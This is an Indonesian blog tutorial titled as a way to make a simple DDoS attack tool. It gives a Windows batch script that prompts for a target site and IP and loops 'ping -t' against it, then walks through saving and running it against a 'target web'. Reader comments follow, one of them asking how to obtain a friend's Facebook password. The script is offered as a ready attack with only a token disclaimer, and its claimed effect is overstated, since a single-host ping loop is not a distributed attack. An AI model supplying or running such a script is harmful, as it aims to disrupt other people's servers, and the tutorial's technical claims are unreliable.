membuat tools DDos atack sederhana

14.31



DDoS (denial-of-service attacks) adalah jenis serangan terhadap sebuah komputer atau server di dalam jaringan internet dengan cara menghabiskan sumber (resource) yang dimiliki oleh komputer tersebut sampai komputer tersebut tidak dapat menjalankan fungsinya dengan benar sehingga secara tidak langsung mencegah pengguna lain untuk memperoleh akses layanan dari komputer yang diserang tersebut.


Dan pada kali ini admin akan mencoba menshare kan cara untuk membuat tool ddos atack itu secara sederhana.kenapa sederhana?? karena hanya berbekal notepad saja..

1. Buka Notepad
   bisa sobat temukan di start >> All programs >> Accessories >> Notepad 



2. Masukkan kode di bawah ini

@echo off
mode 67,16
title DDOS Attack
color 0a
cls
echo.
echo DDOS With Batchfile
echo.
set /p x=Server-Target:
echo.
ping %x%
@ping.exe 127.0.0.1 -n 5 -w 1000 > nul
goto Next
:Next
echo.
echo.
echo.
set /p m=ip Host:
echo.
set /p n=Packet Size:
echo.
:DDOS
color 0c
echo Attacking Server %m%
ping %m% -i %n% -t >nul
goto DDOS

3. Lalu sobat Save As


4. Beri nama DDOS.Bat lalu ubah save as type menjadi All Files lalu pilih Save



5. buka file yang sudah sobat buat itu,bila berhasil tampilan nya akan seperti ini..


6. Masukkan web target sobat pada kolom yang berkedip lalu tekan enter..
7. selanjut nya silahkan sobat masukkan ip addres web target sobat lalu tekan enter lagi..
    bisa sobat cari ip nya di http://www.viewwhois.com/


8. Selesai..

efek nya nanti bila kita melakukan secara berulang-ulang web target akan semakin lambat jika di akses ..

Note: ini cuma untuk Just for share aja sobat jadi  jangan di pergunakan sembarangan ya,...:)


Artikel Terkait

Previous
Next Post »

12 komentar

Write komentar
13 Januari 2013 14.42 delete

Asik nih sob tutorialnya :D

Reply
avatar
wahyu di
AUTHOR
13 Januari 2013 17.13 delete

wah-wah sangat menambah ilmu Gan, makasih tutorialnya, sukses selalu dan selamat sore Gan. :)

Reply
avatar
13 Januari 2013 17.21 delete

@AdityaReinaldo : Ok sobat silahkan di coba aja..
@wahyu di : OK sobat terima kasih silahkan di coba..
semoga selalu sukses juga,..:)

Reply
avatar
13 Januari 2013 22.01 delete

Tutorial yang sangat berguna kawan
terima kasih sudah berbagi

Reply
avatar
Technology
AUTHOR
14 Januari 2013 09.53 delete

tutorial yg bermanfaat sob ..
ijin mempelajari :D

Reply
avatar
14 Januari 2013 14.13 delete

@Penyuluh Perikanan : ok kawan thanks jug atas kunjungan nya..
@Technology : ok sobat silahkan di pelajari..

Reply
avatar
2 Februari 2013 16.19 delete

sebuah tutorial yang singkat dan praktis untuk di pahami dengan mudah. thanks kawan tutorial yang berguna

Reply
avatar
Anonim
AUTHOR
22 Februari 2013 22.32 delete

share dong cara mengetahui usename serta pass fb milik temen kita

Reply
avatar
Galuh_boyter
AUTHOR
1 Maret 2013 17.40 delete

om tapi sama avira ke detect virus, ato memang begitu? hehe maaf ane masih nubi :))

Reply
avatar
Anonim
AUTHOR
7 April 2013 00.00 delete

ok banget sob thanks sharenya hehehehehe

Reply
avatar
22 Juni 2013 19.04 delete

@Galuh_boyter : Masa iya sob..?
Ane make Avira Internet security 2013 aman-aman aja kok..

Reply
avatar

Berkomentarlah secara dewasa,
Mencantumkan link aktif di komentar akan saya hapus

Terima kasih ^_^

EmoticonEmoticon